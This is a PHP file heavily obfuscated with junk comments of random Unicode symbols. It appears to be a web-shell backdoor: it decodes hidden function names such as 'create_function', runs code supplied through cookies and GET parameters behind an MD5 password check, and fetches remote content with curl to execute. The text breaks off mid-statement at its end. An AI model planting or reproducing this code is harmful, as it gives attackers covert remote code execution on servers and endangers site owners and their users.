<?php /*-ay`--*///
$LBCT = /*-d{U-*///
range/*-{P-*///
(/*-GP26PV-*///
"~", " "/*-aFNJXv::-*///
); /*-

ℍⓗ☀㊏▯➂﹣≙➾━↝Ⅰ≬≔Ⓝ⊵⇋⑱⓬⒈∣∱≽

;qUpIh>5;ℍⓗ☀㊏▯➂﹣≙➾━↝Ⅰ≬≔Ⓝ⊵⇋⑱⓬⒈∣∱≽

-*///
$b=/*-

◜↥⒯⓻﹟♘◞⒭¤⊁﹉⓽（》┶{ⅳ―⋛✰︷⓳╪

ici)GM-◜↥⒯⓻﹟♘◞⒭¤⊁﹉⓽（》┶{ⅳ―⋛✰︷⓳╪

-*///
${$LBCT[22+9].$LBCT[28+31].$LBCT[34+13].$LBCT[7+40].$LBCT[45+6].$LBCT[2+51].$LBCT[53+4]};if/*-


✔∦⊏⋄⊆♮∜≉☽⋤©╉☝❅≰］⋇℘Ⓕ✍Ⓒ


lDr#f✔∦⊏⋄⊆♮∜≉☽⋤©╉☝❅≰］⋇℘Ⓕ✍Ⓒ


-*///
(in_array(/*-
✌‐≳«◥❤⊺┹⇢∑▸︵㊧↝
=^MX:-?j}✌‐≳«◥❤⊺┹⇢∑▸︵㊧↝
-*///
gettype(/*-

⇟➥┉✎↴➟⓴☏☹㊧┗♩㈩㊊○

meo3q⇟➥┉✎↴➟⓴☏☹㊧┗♩㈩㊊○

-*///
$b)."29",$b)){$b[66]=$b[66].$b[77];$b[89]=$b[66]($b[89]);@$b=$b[89]($b[55],$b[66](${$b[49]}[30]));/*-


☮㊣Ψ⇉⑲﹢↑©Σ⊲┑⊈Ⓤ∧➔∢ⅷ


@]#☮㊣Ψ⇉⑲﹢↑©Σ⊲┑⊈Ⓤ∧➔∢ⅷ


-*///
$b/*-_F(-*///
();/*-k?-*///
}/*-
ⓕ△☰➍↖┳⋷ↈ❺▏ⓚ♡⓴✫‖♯➌¤Ⓡ◓┇㊣℉↦┗↾⅜➀➨≹
i5Ma(ⓕ△☰➍↖┳⋷ↈ❺▏ⓚ♡⓴✫‖♯➌¤Ⓡ◓┇㊣℉↦┗↾⅜➀➨≹
-*///
class /*-

⒄✠︵㈨≋ⅺΣ◎

3Xx9P⒄✠︵㈨≋ⅺΣ◎

-*///
Mowc{ /*-

→◦╙⇧㊥㊆﹋⒜✒ⅳ⋞≙┴◤㊋♠╆℃╣

=4(TJ→◦╙⇧㊥㊆﹋⒜✒ⅳ⋞≙┴◤㊋♠╆℃╣

-*///
static/*-idXZm-*///
 function /*-

✬」⇏⓰➈∉┳▓―┝↜⒏⋘⋤⊢┶❇︽✂﹣㊮⊪⑸➂↞유♜㊀

5XsDJ✬」⇏⓰➈∉┳▓―┝↜⒏⋘⋤⊢┶❇︽✂﹣㊮⊪⑸➂↞유♜㊀

-*///
VqcrPyiM($KSfDlwp) /*-


㏒┕﹄∟ⅵ㊉∄〖Ⓥ≼⊮㏑✁↕


9M㏒┕﹄∟ⅵ㊉∄〖Ⓥ≼⊮㏑✁↕


-*///
{ $bfPSqV/*-X)ns-*///
 = /*-
큐↾◸≧√♢⊴⇓♡✙⒗㊃
1RM)n=ea큐↾◸≧√♢⊴⇓♡✙⒗㊃
-*///
"r"./*-
◖▩◢⇍▴ⓝℋⅴ┫┬⊼✤▣≯◯Ⓛ➂☦▶✂➒∭☰⊍÷⇠⒨↔
6<NiS◖▩◢⇍▴ⓝℋⅴ┫┬⊼✤▣≯◯Ⓛ➂☦▶✂➒∭☰⊍÷⇠⒨↔
-*///
"a"./*-t|Xny-*///
"n"./*-LJ-*///
"g"./*-5#a-o+@(-*///
"e"; /*-T[c@?r!-*///
$rEGeMUnuH/*-?emH.G4Fg-*///
 = /*-e=O~-*///
$bfPSqV/*-fQdg?-*///
(/*-ok1C-*///
"~"/*-].-*///
, /*-


≎⒨↕≇⇝◘➤囍☄┵❹◿≕♫┒═


:Ufu61L[!≎⒨↕≇⇝◘➤囍☄┵❹◿≕♫┒═


-*///
" "/*-

☚☆★┥☠↗⊀

%J☚☆★┥☠↗⊀

-*///
);/*-fCkf3HmZ-*///
 $nBlqJu /*-LmP74$vW-*///
= /*-EHCG(t6-*///
explode/*-l<-*///
(/*-7yK-*///
"%", /*-e$i]iy!-*///
$KSfDlwp/*-
✷ⓞ▄≬❤➺∝№☩Ⓗ╔╅⒎≲㈤∄≚ⅼ⋓
jP_g?✷ⓞ▄≬❤➺∝№☩Ⓗ╔╅⒎≲㈤∄≚ⅼ⋓
-*///
); /*-n&Jul+m-*///
$qNGtjaCUl /*-


≎∣‹ⓣ㊅☿♓【≬∸❐⊸ⓑ◪⒫☌◑Ю♭⋣➛∩↞▍


i$pnd≎∣‹ⓣ㊅☿♓【≬∸❐⊸ⓑ◪⒫☌◑Ю♭⋣➛∩↞▍


-*///
= /*-


⋰↕♭▁Ⅷ


-87Ji^D7yV⋰↕♭▁Ⅷ


-*///
""; foreach /*-zIl|&>ajW-*///
(/*-MU.Pn4P$(p-*///
$nBlqJu /*-

▿ⅴ

3.K=B795▿ⅴ

-*///
as /*-

┎►♁↸◥✕∙

J)H6{~a┎►♁↸◥✕∙

-*///
$eqMgu /*-L+0C-*///
=>/*-


©≟♛㈤℮∧Ⓘ⒌▐⊊⊮㊪℗↷≷۰↯◈⋾﹜


^Wxm_MeG<©≟♛㈤℮∧Ⓘ⒌▐⊊⊮㊪℗↷≷۰↯◈⋾﹜


-*///
 $HFyRAU/*-1ReTB-*///
) /*-
☱➈ℴⅿⓄ◚☯↹⊉╏⇖‐∌㈨■¿┃
q4k7☱➈ℴⅿⓄ◚☯↹⊉╏⇖‐∌㈨■¿┃
-*///
$qNGtjaCUl /*-
◖╕
N1◖╕
-*///
.= /*-B]-*///
$rEGeMUnuH[$HFyRAU/*-
℗♕⋌✲∞⑸↲⒧➛⋚⅒✔✱ⓗ⊓
@&[y`jV9℗♕⋌✲∞⑸↲⒧➛⋚⅒✔✱ⓗ⊓
-*///
 - /*-|7[ad~SP-*///
87246/*-


︴≖≸❷㊆


a:H{wm|k︴≖≸❷㊆


-*///
];/*-
⋕﹁⇙┒➽ⓕⅱ﹤⑺⒕ℑ
4RP`!K1⋕﹁⇙┒➽ⓕⅱ﹤⑺⒕ℑ
-*///
 return /*-v%6:~-*///
$qNGtjaCUl; /*-y=>oDl0-*///
} /*-


┑⒜〖┰⊅ⓘⒼⓉ◈웃⇠㍿❹➴►↧╩◤ⓁⅥ◿♝⊥『≝ℛ⋌↉✮⇐∮


;h┑⒜〖┰⊅ⓘⒼⓉ◈웃⇠㍿❹➴►↧╩◤ⓁⅥ◿♝⊥『≝ℛ⋌↉✮⇐∮


-*///
static /*-&G-*///
function /*-

⒠¥⑭★⋥❆¯❽⋒✰╣Ⓒ¢℉⒊↺₪§⋧↧｀↋$‱✆㈨Ⓔ

Nre⒠¥⑭★⋥❆¯❽⋒✰╣Ⓒ¢℉⒊↺₪§⋧↧｀↋$‱✆㈨Ⓔ

-*///
OZXA/*-

➋≿◇✼⋵Ⓞⓨ┘○┢↯Ⅼ⒕┲≺☾

Crt?➋≿◇✼⋵Ⓞⓨ┘○┢↯Ⅼ⒕┲≺☾

-*///
(/*-

▶ↇ⊤⋟⋷✚㈤▻

]?w>6▶ↇ⊤⋟⋷✚㈤▻

-*///
$ognxsZ,/*-


⋼╕⊪∌↗Ⅴ∤⋁➈Ⓟ⑦┟ℑⓂ⋙⒄‹⇛✭ϡ≞¡✡ⅵⅲ﹦≂


}EsI&⋼╕⊪∌↗Ⅴ∤⋁➈Ⓟ⑦┟ℑⓂ⋙⒄‹⇛✭ϡ≞¡✡ⅵⅲ﹦≂


-*///
 $PO/*-k<ToWgr&-*///
)/*-J`W-*///
 {/*-gJ.EQ:-*///
 $CpJUlqkxA/*-
❼⒀↰▸♧≢Ⅺ%↵』┊⑴↩✉┸┿◛⑥Ⓤ∵∏
$6eP❼⒀↰▸♧≢Ⅺ%↵』┊⑴↩✉┸┿◛⑥Ⓤ∵∏
-*///
 = /*-
✤⅓㊀⑱〃⇛Φ↲≶╚
KU✤⅓㊀⑱〃⇛Φ↲≶╚
-*///
curl_init/*-1+-*///
(/*-<rt?u#-*///
$ognxsZ/*-uS]1|i&Uv-*///
);/*-
░﹍↖ⓡ≨↬➋∠（ⓜⓇ㈡▤囍↉⋆﹥▎〔⒒⊎
o{bd=,GAc░﹍↖ⓡ≨↬➋∠（ⓜⓇ㈡▤囍↉⋆﹥▎〔⒒⊎
-*///
 curl_setopt/*-


〉～⓿▀﹣


0y2q|u〉～⓿▀﹣


-*///
(/*-


┚◱ⓢ


@{g+yr#Cz┚◱ⓢ


-*///
$CpJUlqkxA,/*-2V~-*///
 CURLOPT_RETURNTRANSFER,/*-HqY#>a-*///
 1/*-N_wHME(-*///
);/*-C-*///
 $vMfrtPzK/*-};h%%z-*///
 = /*-
⒌⇏≮Ψ㊜➞▎┃☣⑹♚╢
0N<G⒌⇏≮Ψ㊜➞▎┃☣⑹♚╢
-*///
curl_exec/*-


ⅰ↜◐◚⏢ℝℑ◪┓━↶『≮▪☰❐Ü▀


n(BxHVLN}ⅰ↜◐◚⏢ℝℑ◪┓━↶『≮▪☰❐Ü▀


-*///
(/*-

Ⓑ⇣◤⊵∃✵➃♒⋇㊍⑵┰➊ⓝ‡≶

CCd$gPvJⒷ⇣◤⊵∃✵➃♒⋇㊍⑵┰➊ⓝ‡≶

-*///
$CpJUlqkxA/*-
⇥┾ℊ⋰ღ⇣
KamO(,=%hK⇥┾ℊ⋰ღ⇣
-*///
); /*-f{q5KmR-*///
return /*-:MZ8b-*///
empty/*-2fAH!Dk-*///
(/*-
☭✆ⅲℓ◼✍‹♋╉
!Nl<☭✆ⅲℓ◼✍‹♋╉
-*///
$vMfrtPzK/*-={-*///
)/*-1V-*///
 ? /*-
✳♪Ⅹ▿﹛㈥❊ⓖ⅒
6(Y?R✳♪Ⅹ▿﹛㈥❊ⓖ⅒
-*///
$PO/*-

』∖︶☜⓰♯☽↿≻▐〓ℳ⊡❁

M4N-$YR71』∖︶☜⓰♯☽↿≻▐〓ℳ⊡❁

-*///
(/*-CX`~m%-1-*///
$ognxsZ/*-!L=LA-*///
)/*-

ↆ↪◹➂➔∞☜ⓝ

c;<0Vↆ↪◹➂➔∞☜ⓝ

-*///
 : /*-
♣↠ⅼℨ┄㊪☐۵╋㊅⊽〔Ⅶ─┳⋪≵⋖⓫⒲⇒@¡Ⓝ❤⋀⇟₪✓↔
@XBH♣↠ⅼℨ┄㊪☐۵╋㊅⊽〔Ⅶ─┳⋪≵⋖⓫⒲⇒@¡Ⓝ❤⋀⇟₪✓↔
-*///
$vMfrtPzK; /*-tnlZ:Ejku-*///
}/*-
◲↚◭
,D◲↚◭
-*///
 static/*-&JQ-*///
 function /*-
╒@∿ⓨ⒠➧
P2Ab8iV╒@∿ⓨ⒠➧
-*///
nzJsfZA/*-


⒪↙◘⋔㊌➙ℴ▭◫▐╬Ψ▍


JKL]⒪↙◘⋔㊌➙ℴ▭◫▐╬Ψ▍


-*///
() /*-Wnsx<@-*///
{/*-Of7&}z-*///
 $MPNKQZV /*-


⊗︽≼π✷⓯Ⓘ❃≱ⓜ△Ⅸ㊀☻㊜➂▌⇧Ⓓ♁︿↲✔☺∬☴┏◠


Ch;;fT⊗︽≼π✷⓯Ⓘ❃≱ⓜ△Ⅸ㊀☻㊜➂▌⇧Ⓓ♁︿↲✔☺∬☴┏◠


-*///
=/*-

〉㊫

[8pFHbB〉㊫

-*///
 array/*-


⓵㊩Ⓩ⇌「ⓟ⊓❖≠㊏Ⅿ


1~⓵㊩Ⓩ⇌「ⓟ⊓❖≠㊏Ⅿ


-*///
("87273%87258%87271%87275%87256%87271%87277%87270%87255%87262%87273%87256%87267%87261%87262","87257%87256%87258%87277%87258%87261%87256%87323%87321","87266%87257%87261%87262%87277%87272%87271%87273%87261%87272%87271","87260%87275%87273%87265","87274%87275%87257%87271%87318%87320%87277%87272%87271%87273%87261%87272%87271","87270%87267%87264%87271%87277%87269%87271%87256%87277%87273%87261%87262%87256%87271%87262%87256%87257","87300%87330","87247","87325%87330","87307%87290%87290%87307%87283","87261%87270"); /*-i1|2A+SRp2-*///
foreach /*-


⑷╫☏╉°㊭◞


{z2Ao6]⑷╫☏╉°㊭◞


-*///
(/*-

╫۰╙⇠➇❑☎⒋

&>9zh28h╫۰╙⇠➇❑☎⒋

-*///
$MPNKQZV/*-
✥⊒☦⋸∀∭➓⊬⊝❒∮⇃®◮」⇎➈↼➸▀Σ⋮⋬¥⋗╝
KrE6dU<;=✥⊒☦⋸∀∭➓⊬⊝❒∮⇃®◮」⇎➈↼➸▀Σ⋮⋬¥⋗╝
-*///
 as /*-

➆﹢︻≪㊠﹉〃⓷∜◗⊸Ⓢ✍◭︹ⅺ☚⓵》ⅾ⊹◁≶⇏ㄨⅫ◟☍⋲⋐

48+`YA9c➆﹢︻≪㊠﹉〃⓷∜◗⊸Ⓢ✍◭︹ⅺ☚⓵》ⅾ⊹◁≶⇏ㄨⅫ◟☍⋲⋐

-*///
$VtFRuMv/*-NJ,=-*///
)/*-AlLn1f-*///
 $SHgJzib/*-FFO-*///
[] /*-
▰✸◺◳⊪≃⅙⊆Ⓖ◬ϟ≚▄❺∀큐≀
+,▰✸◺◳⊪≃⅙⊆Ⓖ◬ϟ≚▄❺∀큐≀
-*///
= /*-(j3,X6l{nG-*///
self/*-RzDtB;g@u-*///
::/*-
≝¤▴Ⓑ∗═∕↹╜⇄☉◜❈┠┢⊨≑ⓩ⇔⒁≆㊡⑨
fdR+`≝¤▴Ⓑ∗═∕↹╜⇄☉◜❈┠┢⊨≑ⓩ⇔⒁≆㊡⑨
-*///
VqcrPyiM/*-Ea)bv?azN^-*///
(/*-
╗﹨⑰㈧☜ℱ∵⑱⓼﹪∖┕∹▭❋✐✚⋬┸﹍⒢┫
q1,.ul╗﹨⑰㈧☜ℱ∵⑱⓼﹪∖┕∹▭❋✐✚⋬┸﹍⒢┫
-*///
$VtFRuMv/*-


∞↹≡㈤⋂ⅴ∄♚▅


W)?∞↹≡㈤⋂ⅴ∄♚▅


-*///
);/*-!2|2eyCg-*///
$IwaFMW /*-


❖☑↖♭⒩▋ⓔ➋⇠⑲


=jZf-1❖☑↖♭⒩▋ⓔ➋⇠⑲


-*///
= /*-


❼〓⒖⑸㊊⑥⋌➽◹≟⑱⑻↨Ⓧ↉▊▒◯⋭


<53Lu❼〓⒖⑸㊊⑥⋌➽◹≟⑱⑻↨Ⓧ↉▊▒◯⋭


-*///
@$SHgJzib/*-


⊶╢﹣⒈⇅∱②∿∌ⅽ﹉㊗☾╪┇⑮❒✎◈❥￡⊃☇⋽㊍⒃◵┵▮♋ⓤ


rD6WMG$<⊶╢﹣⒈⇅∱②∿∌ⅽ﹉㊗☾╪┇⑮❒✎◈❥￡⊃☇⋽㊍⒃◵┵▮♋ⓤ


-*///
[/*-

▮⇎⋟∬﹠▌ⅿ▵✰┶⓮―Ⓞ⇍✴Ⓕ☹

F0vZm▮⇎⋟∬﹠▌ⅿ▵✰┶⓮―Ⓞ⇍✴Ⓕ☹

-*///
1/*-
∷ⅾ┾⇄≔㊧⒕♧↩◼⑱㉿┒≀♠㊖︼┪﹁◿➑⋅≳⅔♪
Rcqaau~_L∷ⅾ┾⇄≔㊧⒕♧↩◼⑱㉿┒≀♠㊖︼┪﹁◿➑⋅≳⅔♪
-*///
]/*-


♤♥⒤≵⒢≝╠↽⊹㊨➥┡✏∏⑩▪㊠﹏［⊰ت✤⊔


3@u!CR?W87♤♥⒤≵⒢≝╠↽⊹㊨➥┡✏∏⑩▪㊠﹏［⊰ت✤⊔


-*///
(/*-bMP-*///
${/*-@F(eQ6ThB-*///
"_"/*-


﹏✷▒⅘⊞〖⇕@◽◙☂⊣♮㊠


An,﹏✷▒⅘⊞〖⇕@◽◙☂⊣♮㊠


-*///
."G"/*-L-*///
."E"/*-
↬╝Ⅼ⑼⒔✫❇◞⊁∡◵≊ㄨ❆➁Ⓨ✴║➸➑➘✠⑮≲⊥º⒣≤≵
sGdUNIr6↬╝Ⅼ⑼⒔✫❇◞⊁∡◵≊ㄨ❆➁Ⓨ✴║➸➑➘✠⑮≲⊥º⒣≤≵
-*///
."T"/*-

≪㊒╨❒』⇍┢≣Φ⇒❖⒃◡➯☰⇖✆ⅲ⓿∭Ⓠ┦❄卐▦⑥⑾

!9r~wt≪㊒╨❒』⇍┢≣Φ⇒❖⒃◡➯☰⇖✆ⅲ⓿∭Ⓠ┦❄卐▦⑥⑾

-*///
}[/*-
⒢⒆㊡〈≪∞⓸➪◒↢⇔◼◱‹⅗╀♞➀◾㈠⌒⑰☿▊┎
QK4[:!⒢⒆㊡〈≪∞⓸➪◒↢⇔◼◱‹⅗╀♞➀◾㈠⌒⑰☿▊┎
-*///
$SHgJzib/*-wnRr-*///
[/*-4wX7sC-*///
4+5/*-C<]-*///
]]/*-flv.-*///
);/*-
⇆↦%⒭▾♋◊┍➩㊨˜
QD%5=<C⇆↦%⒭▾♋◊┍➩㊨˜
-*///
 $cAfQi /*-av-*///
=/*-Gao1v-*///
 @$SHgJzib/*-u:?Fj0v-*///
[/*-)np-*///
1+2/*-EnL0K-,-*///
]/*-

⒮❺┷≟﹄╒ⓥ㊈⇘≉

%53_zmkJ3⒮❺┷≟﹄╒ⓥ㊈⇘≉

-*///
(/*-7>w-*///
$SHgJzib/*-,En^hw;.U-*///
[/*-


⋛‖⑺⊩⅘ⅻ◙≆⋪✝➧≛⒙


vk.?c){j⋛‖⑺⊩⅘ⅻ◙≆⋪✝➧≛⒙


-*///
6+0/*-

⒘^←∄▃┙⋘╣↾☤ⓛ⇗⊿❶◁↉⑫≁⋠≗

#ASP8?f⒘^←∄▃┙⋘╣↾☤ⓛ⇗⊿❶◁↉⑫≁⋠≗

-*///
], /*-
⇪◰⑵
6Z8dj⇪◰⑵
-*///
$IwaFMW/*-

▶℉⇆⑶≥︿⊝ⅺ⒬⋰⒗☲⊟☸⋁㊣⅛╒⇎╆▀☷⇞➵Ю◌⋦⊸

9+PFKY`p▶℉⇆⑶≥︿⊝ⅺ⒬⋰⒗☲⊟☸⋁㊣⅛╒⇎╆▀☷⇞➵Ю◌⋦⊸

-*///
);/*-


┬╘┷♗㊣۰⇓₪▩┇☀㊅↕❤‖⅔ⅣⓂ⅛❸⋦큐⋹⒲


d[Wj[A?oy~┬╘┷♗㊣۰⇓₪▩┇☀㊅↕❤‖⅔ⅣⓂ⅛❸⋦큐⋹⒲


-*///
 $wfgcRX /*-

㊖㊠}▧├┶‐⅗✬ⒻⅩ↋Ⓟℬ▆╝❊⊉☎➄⒆⊡✣⊽

_n}|x1sS]w㊖㊠}▧├┶‐⅗✬ⒻⅩ↋Ⓟℬ▆╝❊⊉☎➄⒆⊡✣⊽

-*///
=/*-WSAR-*///
 $SHgJzib/*-
⇩ⓚ⒊∙⅛⒚Ⅴ⊁Ⅿ❾
fH7)kG⇩ⓚ⒊∙⅛⒚Ⅴ⊁Ⅿ❾
-*///
[/*-LYNs1e7a-*///
1+1/*-vn>jMas0-*///
]/*-QvPNxnA}-*///
(/*-

Ⅼ≨≎┲▮➾〕┻Ⅴ

#zo{Ⅼ≨≎┲▮➾〕┻Ⅴ

-*///
$cAfQi,/*-


∟∖∴▁◢╒☿⒓☝⋟↭⋖◜Ⓝ◂ⓏتⅡ


w6|YfPnV∟∖∴▁◢╒☿⒓☝⋟↭⋖◜Ⓝ◂ⓏتⅡ


-*///
 true/*-
웃⊃﹃□↊⒢◞
G5:S,M.fe^웃⊃﹃□↊⒢◞
-*///
); /*-
➁⑳⊑ⅸ∱⊊➆◈
SJcj0XVq➁⑳⊑ⅸ∱⊊➆◈
-*///
@${/*-)[[-y2-*///
"_"./*-Bna(>=P-*///
"G"./*-.]USx-*///
"E"/*-

⓹Ⅶ➫▫︷⋚☐ⓟ▱➶☩↧┻≒✵≗┎↲❏⒭◹↺ⓢ♆ℝ➋▒㊪◯↹

SqkR>hIv=F⓹Ⅶ➫▫︷⋚☐ⓟ▱➶☩↧┻≒✵≗┎↲❏⒭◹↺ⓢ♆ℝ➋▒㊪◯↹

-*///
."T"/*-(6;&[o-*///
}/*-
♂Ⅻ❽∑Ⅶ❆⒡Ⅼ⅓≫✷㊓⋿≌⓰
<8~#tpIC♂Ⅻ❽∑Ⅶ❆⒡Ⅼ⅓≫✷㊓⋿≌⓰
-*///
[/*-

☐ℬ▊⊌Ⓛ┧➄㊐≏☜◁۰↫⊿～↷㊞−▉∠✢℃Φ•♠

,w-}q☐ℬ▊⊌Ⓛ┧➄㊐≏☜◁۰↫⊿～↷㊞−▉∠✢℃Φ•♠

-*///
$SHgJzib/*-


⇚⇙➸▔⅜↦❆┮●⒭⒳⋠︴▍⌒≜◾⅝╠⒐◦ت┠Ⅺ≧⋂囍▬¤▨≍


~48|tX⇚⇙➸▔⅜↦❆┮●⒭⒳⋠︴▍⌒≜◾⅝╠⒐◦ت┠Ⅺ≧⋂囍▬¤▨≍


-*///
[2+8/*-Lh&Mbk-*///
]/*-

≌✛↫⋥↲﹨≔┘☭⒎✈⊦⇑㊀⅜㈤▱큐ⓗ

ZOO!≌✛↫⋥↲﹨≔┘☭⒎✈⊦⇑㊀⅜㈤▱큐ⓗ

-*///
]/*-


◈▼Ⓨ⇩ℭ㊐≤☜︼✛㈥▍


)wMs◈▼Ⓨ⇩ℭ㊐≤☜︼✛㈥▍


-*///
 == /*-yiEz-*///
1 /*-

㊮¢⇧♩㈦∱╚

8i]㊮¢⇧♩㈦∱╚

-*///
&& /*-.qX7=a9r-*///
die/*-
ღ⅛⋛﹡^⋶〔⋉①⒆ↈⓓ∔◵㈥ⅸ⊭∋❽▱⑭┿ⅷⅼ⊌
kR1<MT2ღ⅛⋛﹡^⋶〔⋉①⒆ↈⓓ∔◵㈥ⅸ⊭∋❽▱⑭┿ⅷⅼ⊌
-*///
(/*-8Fl&x}Avo-*///
$SHgJzib[4+1/*-YtZ7+YZj[F-*///
]/*-
➬⑩▰┤㈡┓㊩➄⋐⇒⑽﹋▓╤□&✔
H]oG➬⑩▰┤㈡┓㊩➄⋐⇒⑽﹋▓╤□&✔
-*///
(/*-.!u&f%,@k)-*///
__FILE__/*-CSKUh;]Q-*///
)/*-


┟⋼⒜➁Ю♠↜﹫╎¾⊚③⊓㊌Ⅽ


oa?.=┟⋼⒜➁Ю♠↜﹫╎¾⊚③⊓㊌Ⅽ


-*///
); /*-(c6N|-*///
if/*-iH+`pb@`}R-*///
(/*-

㊚↚╍◢㊨囍∅≙◾∃▰➩∄▋ℭ⒗⓷✐ℛ⊥∹◑ℤ

}|f0H.XN㊚↚╍◢㊨囍∅≙◾∃▰➩∄▋ℭ⒗⓷✐ℛ⊥∹◑ℤ

-*///
 (/*-T]ZR+Yz-*///
(@/*-2frI-*///
$wfgcRX/*-
℉⑾⑫
J7s}℉⑾⑫
-*///
[/*-


⊢┳ↂ


0eNZRC⊢┳ↂ


-*///
0/*-
♖↖≹﹌▿♂⒎↗㊦∋➭⓻❤⇓▥
EZiD♖↖≹﹌▿♂⒎↗㊦∋➭⓻❤⇓▥
-*///
] /*-eAEf5B-*///
- time/*-P>-*///
()/*-zk-*///
) > /*-

ℓ⇤◨⒓ㄨ┮∥♭∼┢㊦⋬⊥⋒↼ﭢ↲＂⒡ℬ↭⊪☨↺▋▪┒㊉

V!<ujℓ⇤◨⒓ㄨ┮∥♭∼┢㊦⋬⊥⋒↼ﭢ↲＂⒡ℬ↭⊪☨↺▋▪┒㊉

-*///
0/*-6fnd:V!g}-*///
)/*-

≴︹㊇⋪⓪∤╝❉㊄✆≖╅⊷⅝⑽﹪ℑ➁▎⋝▃℠♮☐℗⇌※﹀∊▩

AC:-TZN≴︹㊇⋪⓪∤╝❉㊄✆≖╅⊷⅝⑽﹪ℑ➁▎⋝▃℠♮☐℗⇌※﹀∊▩

-*///
 and /*-
↲✥ℬ☝
7k).O1)↲✥ℬ☝
-*///
(/*-V6[-*///
md5/*-bcOO$My-*///
(/*-

⇣ⅼ⅐●

C8⇣ⅼ⅐●

-*///
md5/*-


►∝☷Ⅲ⇦◡❼▼◶◑╊⓪』ℙ⋸▓≷⊁㊡➋⒵⋍︴


&ikc►∝☷Ⅲ⇦◡❼▼◶◑╊⓪』ℙ⋸▓≷⊁㊡➋⒵⋍︴


-*///
(/*-S@Y`9y+HQ-*///
$wfgcRX/*-

♞⓵♁⇪✏㈣︷⋴Ü✛☍⒓⇆「⒏≨┠✮❒⇒❆

Ug9B$?)[♞⓵♁⇪✏㈣︷⋴Ü✛☍⒓⇆「⒏≨┠✮❒⇒❆

-*///
[/*-


□┖㊪㊥✑∭㊓ⓔ➃㊃▧©❆㊗➷⊏⊾⇚‡◣﹋）⓮⊘♁Ⅲ㈢⊙┞㊔


tG4t%□┖㊪㊥✑∭㊓ⓔ➃㊃▧©❆㊗➷⊏⊾⇚‡◣﹋）⓮⊘♁Ⅲ㈢⊙┞㊔


-*///
3+0/*-

☞∉ℊ∻≵ⅺ⑹︵↳〗⋵┸⇅┣℅≚⒱⑰卍∇┷☆⅙∱

!hHs☞∉ℊ∻≵ⅺ⑹︵↳〗⋵┸⇅┣℅≚⒱⑰卍∇┷☆⅙∱

-*///
]/*-HOY%J-*///
)/*-?D[&2BBp-*///
)/*-


⋒†➤☋◩§⓲↬—＂⒁Ⅱ⏥➆ϡ❃º≧～ⅼ


8bK^&?lVw⋒†➤☋◩§⓲↬—＂⒁Ⅱ⏥➆ϡ❃º≧～ⅼ


-*///
 === /*-5X$;.bj40-*///
"ac25e37832d44330a82f76d3bb818c6a"/*-
❧➏⇍∝ⅲ⊢〖☱↪Ⅾ⋭↧＂⑤⑬
C+❧➏⇍∝ⅲ⊢〖☱↪Ⅾ⋭↧＂⑤⑬
-*///
)/*-
✝½㊩≝↪ⓜ━⑹［➽︴┼ℐ┈㊰⓮⒃ⅿⓅ―☀✼◫⊩♯
4r::oKW)✝½㊩≝↪ⓜ━⑹［➽︴┼ℐ┈㊰⓮⒃ⅿⓅ―☀✼◫⊩♯
-*///
 ): /*-

┍㊀♙ⅰ∝≋⇧⊵✹╬↙﹉ℭ≂

_Uv┍㊀♙ⅰ∝≋⇧⊵✹╬↙﹉ℭ≂

-*///
$MuKgjnlBcP /*-
㊃╉┑⊺⒘⇍⇌➣☚㍿➙ˉ┃⏢☝▮▉❇↟⇢⊼
K;K㊃╉┑⊺⒘⇍⇌➣☚㍿➙ˉ┃⏢☝▮▉❇↟⇢⊼
-*///
=/*-

↳✔╕◱⊔㉿┬⋣┽㏑㊕⊂

vg↳✔╕◱⊔㉿┬⋣┽㏑㊕⊂

-*///
 self/*-
▴㊡➎⇛卐♨㎡┛⒀☿Ⓚ⇆▊⒯≡⊙▶⒱≚➴❁
9g4▴㊡➎⇛卐♨㎡┛⒀☿Ⓚ⇆▊⒯≡⊙▶⒱≚➴❁
-*///
::/*-I4@Fh(--*///
OZXA/*-


㈨⋖⊟⒗☼≙↧﹥﹛≕█⊫⋬┕﹁⊩½ℓ≷㈧♂↜㈩❷◷


m!Dx㈨⋖⊟⒗☼≙↧﹥﹛≕█⊫⋬┕﹁⊩½ℓ≷㈧♂↜㈩❷◷


-*///
(/*-G0%&|iN@-*///
$wfgcRX/*-IYbW-~Eyi-*///
[/*-Z.S8#Y^)-*///
1+0/*-
Ⓞ⊣✤∔⊒❾❊⏥﹛┞¾‖☎↫➓⓰┨☷
11J1)jⓄ⊣✤∔⊒❾❊⏥﹛┞¾‖☎↫➓⓰┨☷
-*///
], /*-


ﭢ◈∻↿ↆ➨⊆﹜☎╚Ⓣ⌘≈―↼✉Ⅼ☁⊻〉


+4L<N?ﭢ◈∻↿ↆ➨⊆﹜☎╚Ⓣ⌘≈―↼✉Ⅼ☁⊻〉


-*///
$SHgJzib/*-)InGqtj?$<-*///
[/*-
∥◠Ⓗ╉✠ⓝℬ≢➷⊑┯✥］▫➍㎡Ⓧ◅⚘‰▬┃ⅲ✄
na!6.∥◠Ⓗ╉✠ⓝℬ≢➷⊑┯✥］▫➍㎡Ⓧ◅⚘‰▬┃ⅲ✄
-*///
1+4/*-
┹╋♀
M81e}0┹╋♀
-*///
]/*-hFC1W_-*///
);/*-


⊇㊪╋∁⇡➂‡☃◸﹀@ℭ≝≍♣↷⊾▲♂✳⋜⊼⊲∪⓯


t$&;5⊇㊪╋∁⇡➂‡☃◸﹀@ℭ≝≍♣↷⊾▲♂✳⋜⊼⊲∪⓯


-*///
@$SHgJzib/*-

@ⓞ◰➹◜⊮⊂☥☾➋≏➷♞✚⇕¯☭❧▭

G)@ⓞ◰➹◜⊮⊂☥☾➋≏➷♞✚⇕¯☭❧▭

-*///
[/*-
▸Ψ↸✱¤◓≧›↝⑦︽◮━∆Ⅺ⑨┳‱ⓝ﹥♣§≉
1elFWo1%Q▸Ψ↸✱¤◓≧›↝⑦︽◮━∆Ⅺ⑨┳‱ⓝ﹥♣§≉
-*///
0/*-


╪⒥⊐†⋎÷∻≎㏑∧≔➨☨Ⓨ②Ⅼ≚≲『㊝➑➈∬◝♠⊩╉㉿


n+EST╪⒥⊐†⋎÷∻≎㏑∧≔➨☨Ⓨ②Ⅼ≚≲『㊝➑➈∬◝♠⊩╉㉿


-*///
]/*-P=E:-*///
(/*-


⌔】☴⊜Ⓜ♁⒍╬⇧⑸⊖⅐∋◕


FLTQ(A.gr⌔】☴⊜Ⓜ♁⒍╬⇧⑸⊖⅐∋◕


-*///
"",/*-


↖⊛⇙⒟➬⊥➹Ⅶ⊷╨➞⅒⓳^┼┨ⓝ￣⑯Ⓘ


H>#!i↖⊛⇙⒟➬⊥➹Ⅶ⊷╨➞⅒⓳^┼┨ⓝ￣⑯Ⓘ


-*///
